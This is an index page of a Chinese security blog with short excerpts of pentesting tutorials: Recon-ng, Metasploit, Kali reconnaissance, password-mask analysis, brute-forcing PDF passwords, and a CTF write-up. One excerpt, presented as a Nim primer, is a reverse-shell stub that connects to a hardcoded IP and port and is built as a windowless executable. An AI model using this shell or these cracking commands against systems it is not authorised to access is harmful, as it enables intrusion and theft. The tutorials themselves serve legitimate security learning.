avatar
文章
319
标签
29
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

|
Recon-ng初探
发表于2024-01-13|渗透测试
Recon-ng初探模块安装Kali自带Recon-ng,但模块一个没装,得科学上网,然后recon-ng的shell中执行: 1marketplace install all 示例选择模块: 1modules load recon/domains-hosts/hackertarget 查看模块信息: 1info 设置目标: 1options set SOURCE blog.bbskali.cn 运行模块: 1show hosts 实战枚举百度网站子域名,并导出为csv。 12345678helpshow modulesuse recon/domains-hosts/baidu_siteshow optionsset SOURCE baidu.comrunuse reporting/csvrun
PDF加密解密
发表于2024-01-13|渗透测试
PDF加密解密给文件添加密码: 1pdftk kali.pdf output out.pdf user_pw 666666 #kali.pdf加密为out.pdf 密码为666666 暴力破解: 1pdfcrack -f out.pdf -n 6 -m 8 -c 0123456789 #-f要破解的文件 -n最短多少字符 -m 最长多少字符 -c使用的字符集 支持字典: 1pdfcrack -f out.pdf -w pass.txt
Nim入门
发表于2024-01-13|编程语言
Nim入门配置按照实际情况配置IP及端口,保存文件为nimshell.nim。 123456789var    targetIP="192.168.1.25"    targetPort="4444"let    exitMessage="Exiting.."    changeDirectoryCommand="cd"    defaultDirectory="C:\\"try:    socket.connect(targetIP,Port(parseInt(targetPort))) 编译1nim c -d:mingw --app:gui nimshell.nim && mv nimshell.exe myshell.exe
Metasploit基础教程
发表于2024-01-13|渗透测试
Metasploit基础教程概述初始化启动PostgreSQL: 1service postgresql start 创建和初始化数据库: 1msfdb init 工作区创建123workspace #查看所有工作区workspace -a test #添加名为test的工作区workspace default #转到default工作区 导入扫描报告12db_import /root/openvas.xmlworkspace -v #查看导入的主机 模块查询预分析12host #查看扫描出的主机vulns #查看扫描出的漏洞 手动查找123456search [options] <keywords>    [options]:        -h 显示帮助        -o <file> 指定输出信息保存文件 格式csv        -S <string> 搜索指定字符串        -u 指定搜索模块 部分keywords: 关键字 描述 aka 别名 author 作者 arch 架构 bid Bugt ...
Kali-Linux渗透测试入门
发表于2024-01-13|渗透测试
Kali-Linux渗透测试入门信息收集发现主机netmask将IP范围转换为CIDR格式: 1netmask -c 192.168.0.0:192.168.2.255 将IP范围转换为标准子网掩码格式: 1netmask -s 192.168.0.0:192.168.2.0 traceroute获取目标主机路由条目: 1traceroute 62.234.110.28 nmap略。 netdiscover检查在线主机。 123netdiscover #尽可能发现多个在线主机netdiscover -r 192.168.1.0/24 #指定区间netdiscover -p #被动ARP监听 域名分析whois查找指定帐号/域名的用户相关信息。 1whois baidu.com dmitry用途同上。 123dmitry -w baidu.com #whoisdmitry -s baidu.com -o subdomain #-s查子域名 -o输出文件 要挂梯子dmitry -p 192.168.29.136 #端口扫描 dnsenum收集域名信息,如:主机地址信息 ...
Kali-Linux常用密码攻击方法
发表于2024-01-13|渗透测试
Kali-Linux常用密码攻击方法Stasprocessor利用马尔可夫攻击方式分析已有的密码字典文件: 123456789statsgen [options] passwords.txt #--version #-h,--help #-o password.marsks,--output=password.masks 保护掩码和统计信息到一个文件 #--hiderare 隐藏比例<1%的统计项 #--minlength=8 过滤最小长度为8的密码 #--maxlength=8 #--charset=loweralpha,numeric 指定过滤的密码字符 #--simplemask=stringdigit,allspecial 过滤密掩码格式 例如分析rockyou.txt密码文件: 1statsgen rockyou.txt 内容分别为: 密码长度统计信息。 密码字符集统计。 密码复杂性统计。 简单掩码统计。 密码字符串掩码格式的高级统计。 掩码格式: 掩码格式 含义 ?l a~z ?u A~ ...
Artfuscator使用方法
发表于2024-01-13|逆向工程
Artfuscator使用方法安装123456git clone https://github.com/JuliaPoo/Artfuscatorcd Artfuscatorgit submodule update --recursive --init --remotecd elvmmake art #事实证明报错也问题不大cd .. 使用在Artfuscator的目录下放置C语言文件,例如hewwo.c。再执行: 1make hewwo IMG=etc/niko-grey.png 其中,选择的图片为当下目录的etc/niko-grey.png。图片要求单通道灰度图片。 生成的文件在dist文件夹下,名称为hewwo.art的可执行文件。
NSSCTF-Round16个人解题报告
发表于2024-01-13|解题报告
NSSCTF-Round#16 Basic个人解题报告test your Debugger三血! 很简单一个动调,动起来就行了。 CompileMe!!!二血! 一个自称为.NET8.0框架的C#工程,改成7.0运行发现类嵌套过多,爆栈了… 改写成C语言发现gcc不理我了,改成Python竟然也爆栈。 搓一个Python脚本把每个return的操作扒下来,记到文件里。 1234567891011121314f=open('Program.cs',encoding='utf-8')content=f.readlines()ptr=52res=[0 for i in range(0,20000)]res[0]=content[ptr][26:45]fin=res[0]for i in range(1,18278): ptr+=9 res[i]=content[ptr][26:45]f.close()f3=open("res.txt",'w')for i in range(0,18278): f ...
D-Eyes常用命令
发表于2024-01-07|渗透测试
D-Eyes常用命令文件扫描123D-Eyes fs #全盘扫描D-Eyes fs -t 8 #8进程D-Eyes fs -P /kali -t 8 #8进程 指定目录 进程扫描12D-Eyes ps #默认扫描D-Eyes ps -p 8888 #指定pid 信息搜集123D-Eyes host #查看主机信息D-Eyes top #查看前15进程D-Eyes sc #主机自检:空密码账户、SSh Server wrapper、SSH免密证书登录、Sudoer、alias、setuid、SSH登录爆破等
PowerShell基本使用
发表于2024-01-06|编程语言
PowerShell基本使用入门123456789Get-Alias #输出内置别名Get-Command -Name Get-Alias #显示Get-Alias命令类型Get-Command -Verb Get #显示动词为Get的命令Get-Command -Noun Content #名词为Content的命令Get-Help Add-Content #获取Add-Content的帮助Get-Help Add-Content -Examples #只获取示例部分Get-Help about_Core_Commands #核心命令的“关于主题”Get-Help -Name About* #About开头的帮助主题Update-Help #更新帮助主题 开发者可能不提供 基本概念12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455Set-StrictMode -Version Latest #启用严格模式 写脚本用 交互无所谓$co ...
1…222324…32
avatar
Monoceros406
Windows系统安全爱好者
文章
319
标签
29
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
Qt6开发入门-常用控件简介2025-05-11
Qt6开发入门-Qt框架综述2025-05-11
C++后端开发入门-环境配置与多线程编程2025-05-05
Qt6开发入门-环境配置与入门2025-05-05
差分隐私实践入门2025-05-03
标签
Win驱动开发 密码学 Python IoT 前端开发 PWN 漏洞复现 Misc 渗透测试 恶意代码 解题报告 AWD WinAPI GUI开发 算法 移动安全 后端开发 沙盒逃逸 逆向工程 取证 Web3 UEFI Web 编程语言 Win系统调试 OpenSSL 数学建模 其他 Win内核安全
归档
  • 五月 20255
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
  • 六月 20249
网站资讯
文章数目 :
319
已运行时间 :
0 天
本站访客数 :
13442
本站总访问量 :
19336
最后更新时间 :
11 小时前
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly